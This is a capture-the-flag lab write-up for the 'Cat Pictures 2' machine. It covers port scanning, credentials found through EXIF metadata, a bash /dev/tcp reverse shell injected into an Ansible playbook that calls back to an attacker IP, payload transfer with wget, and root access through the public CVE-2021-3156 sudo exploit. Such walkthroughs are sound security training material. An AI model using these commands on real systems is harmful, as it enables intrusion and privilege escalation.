Cat Pictures 2
1. Reconnaissance & Enumeration
1.1 Initial Port Scan
export TARGET_IP=10.10.130.75
nmap -p- --min-rate 5000 $TARGET_IP
Results:
Not shown: 65292 closed tcp ports (reset), 237 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
222/tcp open rsh-spx
1337/tcp open waste
3000/tcp open ppp
8080/tcp open http-proxy
1.2 Website Enumeration & Metadata Extraction
Browsing to http://10.10.130.75
reveals a website displaying cat pictures. Examining the first image description we notice a comment: "note to self: strip metadata." This strongly suggests hidden information in the image EXIF data.
We download a specific image and use exiftool
to extract its metadata:
wget http://10.10.130.75/uploads/medium/f5054e97620f168c7b5088c85ab1d6e4.jpg
exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg
Key Finding:
The Title
field in the EXIF data contains: :8080/764efa883dda1e11db47671c4a3bbd9e.txt
. This is a strong indicator of a hidden file on port 8080.
1.3 Hidden File Retrieval
We access the revealed URL: http://10.10.130.75:8080/764efa883dda1e11db47671c4a3bbd9e.txt
.
Contents:
I setup an internal gitea instance to start using IaC for this server. It's at a quite basic state, but I'm putting the password here because I will definitely forget.
This file isn't easy to find anyway unless you have the correct url...
gitea: port 3000
user: samarium
password: TUmhyZ37CLZrhP
ansible runner (olivetin): port 1337
Analysis:
- Gitea Instance: A self-hosted Git service (similar to GitHub) is running on port 3000. We have credentials!
- Ansible Runner: An Ansible automation tool is accessible on port 1337.
- User: samarium Password: TUmhyZ37CLZrhP
2. Exploitation
2.1 Gitea Access & Flag 1
Using the discovered credentials, we log in to the Gitea instance at http://10.10.130.75:3000
. Within the repository, we find flag1.txt
in the samarium/ansible
repository.
- Flag 1 Location:
http://10.10.130.75:3000/samarium/ansible/src/branch/main/flag1.txt
2.2 Ansible Playbook Manipulation & Reverse Shell
The Gitea repository contains an Ansible playbook (playbook.yaml
). The Ansible runner on port 1337 executes this playbook. This presents a classic code injection opportunity.
Modified Playbook (Reverse Shell Injection):
---
- name: Test
hosts: all # Define all the hosts
remote_user: bismuth
# Defining the Ansible task
tasks:
- name: get the username running the deploy
become: false
command: bash -c "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1"
register: username_on_the_host
changed_when: false
- debug: var=username_on_the_host
- name: Test
shell: echo hi
Steps:
- Modify
playbook.yaml
: Update the playbook in the Gitea repository with the reverse shell code. - Start Listener: On your attacking machine, start a Netcat listener:
nc -lvnp 6666
- Trigger Playbook: Navigate to
http://10.10.130.75:1337/
and click the "Run Ansible Playbook" button. - Receive Shell: Your Netcat listener should receive a connection, giving you a shell as the
bismuth
user.
# Attacker Machine
nc -lvnp 6666
# (After triggering the playbook)
# Connection received!
id # uid=1000(bismuth) gid=1000(bismuth) groups=1000(bismuth),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare)
3. Privilege Escalation
3.1 Local Enumeration with LinPEAS
To identify potential privilege escalation paths, we'll use LinPEAS, a comprehensive enumeration script.
Steps:
- Download LinPEAS: Obtain
linpeas.sh
from the official PEASS-ng repository:https://github.com/carlospolop/PEASS-ng/releases
- Transfer to Target:
- Attacker Machine: Start a simple HTTP server:
python3 -m http.server 80
- Target Machine (bismuth shell): Download LinPEAS:
wget http://10.2.17.44/linpeas.sh
- Target Machine: Make it executable:
chmod +x linpeas.sh
- Attacker Machine: Start a simple HTTP server:
- Run LinPEAS: Execute the script:
./linpeas.sh
3.2 Identifying the Vulnerability
LinPEAS output highlights a vulnerable sudo
version: Sudo version 1.8.21p2
. This version is known to be susceptible to CVE-2021-3156 (Heap-Based Buffer Overflow).
3.3 Exploiting CVE-2021-3156
We'll use a publicly available exploit for CVE-2021-3156.
Steps:
- Obtain Exploit: Clone the exploit repository from GitHub:
Attacker Machine
git clone https://github.com/blasty/CVE-2021-3156
- Prepare for Transfer: Create a tar archive for easier transfer:
Attacker Machine
tar -cvf exploit.tar CVE-2021-3156
python3 -m http.server 80 # If not already running - Transfer and Extract:
Target Machine
cd /tmp # Good practice to work in /tmp for exploits
wget http://10.2.17.44/exploit.tar
tar xopf exploit.tar
cd CVE-2021-3156 - Compile and Run:
Target Machine
make
./sudo-hax-me-a-sandwich 0 # Run with target 0 (check available targets with ./sudo-hax-me-a-sandwich)
3.4 Root Shell and Flag 3
If the exploit is successful, you should obtain a root shell.
id # uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1000(bismuth)
cat /root/flag3.txt # Retrieve the final flag